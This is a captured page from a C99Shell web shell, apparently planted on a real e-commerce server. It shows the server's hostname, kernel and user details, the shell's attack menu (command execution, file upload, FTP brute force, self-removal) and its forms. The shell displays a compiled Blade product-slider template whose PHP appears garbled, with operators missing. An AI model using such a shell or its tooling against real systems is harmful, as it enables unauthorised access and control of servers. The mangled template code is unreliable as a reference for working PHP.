!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.04 GB of 117.98 GB (22.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     6d27a4ce6ffb0ae00034bfeba9b39ea2be790add.php (6.2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $offerFlag 
$product->offerCheck();
    
$outOfStock $product->isOutOfStock();
    
$outStock false;
?>
<div class="w-full xxs:w-72% xxs:transform xxs:translate-x-19% sm:w-1/2 lg:w-36% md:order-none <?php echo e(languageDirection() == 'ltr' 'sm:pr-7' 'sm:pl-7'); ?>">
    <div class="product-left mb-5 mb-lg-0 relative">
        <div class="swiper border rounded-md w-full swiper-container-main">
            <div class="swiper-wrapper" id="zoomImage">
                <?php $__currentLoopData $images$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $ProductImage): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                    <div class="relative">
                        <div class="absolute z-10 left-3.5 top-3.5">
                            <?php if($outOfStock['outOfStockVisibility'] == && !$product->isVariableProduct()): ?>
                                <?php $outStock true ?>
                                <p class="bg-pinks-2 relative z-20 h-4 text-reds-3 mb-2.5 w-max px-1.5 flex items-center rounded-sm leading-3 roboto-medium font-medium pt-2p text-8 whitespace-nowrap text-11">
                                    <?php echo e(__('Stock Out')); ?>

                                </p>
                            <?php endif; ?>
                            <?php if(isset($featured) && $outStock == false): ?>
                                <p class="primary-bg-color h-5 w-max mb-2.5 justify-center text-white px-2 flex items-center text-center rounded-sm leading-3 roboto-medium font-medium text-11">
                                    <?php echo e(__('Featured')); ?>

                                </p>
                            <?php endif; ?>
                            <?php if($review_average == && $outStock == false): ?>
                                <div class="flex justify-center items-center px-1.5 whitespace-nowrap mb-2.5 bg-green-5 h-5 leading-3 w-max roboto-medium font-medium text-white text-11 rounded-sm">
                                    <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12"
                                        viewBox="0 0 12 12" fill="none">
                                        <path d="M5 0L6.12257 3.45492H9.75528L6.81636 5.59017L7.93893 9.04508L5 6.90983L2.06107 9.04508L3.18364 5.59017L0.244718 3.45492H3.87743L5 0Z"
                                            fill="white" />
                                    </svg>
                                    <p><?php echo e(__('Top Rated')); ?></p>
                                </div>
                            <?php endif; ?>
                            <?php if($offerFlag && !$product->isVariableProduct() && $outStock == false && !$product->isGroupedProduct()): ?>
                                <p class="primary-bg-color h-5 text-gray-12 px-2 mb-2.5 justify-center flex items-center rounded-sm leading-3 roboto-medium font-medium text-11 whitespace-nowrap uppercase w-max">
                                    <?php echo e(formatCurrencyAmount($product->getDiscountAmount())); ?><?php echo e(__('off')); ?>

                                </p>
                            <?php endif; ?>
                        </div>
                    </div>
                    <div class="swiper-slide minimum-height neg-transition-scale w-full zoom" style="background-image: url(<?php echo e(getBackgroundImage($ProductImage)); ?>);">
                        <img class="swiper-slide-img neg-transition-scale" src="<?php echo e($ProductImage); ?>" alt="...">
                    </div>
                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
            </div>
        </div>
        <!-- Swiper thumbnails -->
        <div dir="ltr" class="w-full flex justify-center items-center">
            <?php if(count($images) > 1): ?>
                <div class="swiper-button-prev swiper-thumbsnail bg-white">
                    <svg xmlns="http://www.w3.org/2000/svg" width="9" height="14" viewBox="0 0 9 14"
                        fill="none">
                        <path d="M2 7L1.29289 7.70711L0.585786 7L1.29289 6.29289L2 7ZM7.29289 13.7071L1.29289 7.70711L2.70711 6.29289L8.70711 12.2929L7.29289 13.7071ZM1.29289 6.29289L7.29289 0.292893L8.70711 1.70711L2.70711 7.70711L1.29289 6.29289Z" fill="#898989" />
                    </svg>
                </div>
            <?php endif; ?>
            <div class="swiper product-slider gallery-thumbs mt-5">
                <div class="swiper-wrapper cursor-pointer" id="sliderImage">
                    <?php $__currentLoopData $images$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $ProductImage): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                        <?php if(count($images) > 1): ?>
                            <div
                                class="swiper-slide flex justify-center items-center border-gray-2 rounded-sm swiper-slide-thumbs">
                                <img class="p-1.5 object-cover h-12 cursor-pointer" src="<?php echo e($ProductImage); ?>"
                                    alt="<?php echo e(__('Image')); ?>">
                            </div>
                        <?php endif; ?>
                    <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                </div>
            </div>
            <?php if(count($images) > 1): ?>
                <div class="swiper-button-next swiper-thumbsnail bg-white">
                    <svg width="9" height="14" viewBox="0 0 9 14" fill="none"
                        xmlns="http://www.w3.org/2000/svg">
                        <path
                            d="M7 7L7.70711 7.70711L8.41421 7L7.70711 6.29289L7 7ZM1.70711 13.7071L7.70711 7.70711L6.29289 6.29289L0.292893 12.2929L1.70711 13.7071ZM7.70711 6.29289L1.70711 0.292893L0.292893 1.70711L6.29289 7.70711L7.70711 6.29289Z"
                            fill="#898989" />
                    </svg>
                </div>
            <?php endif; ?>
        </div>
    </div>
</div>
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/resources/views/site/layouts/section/product-details/slider.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--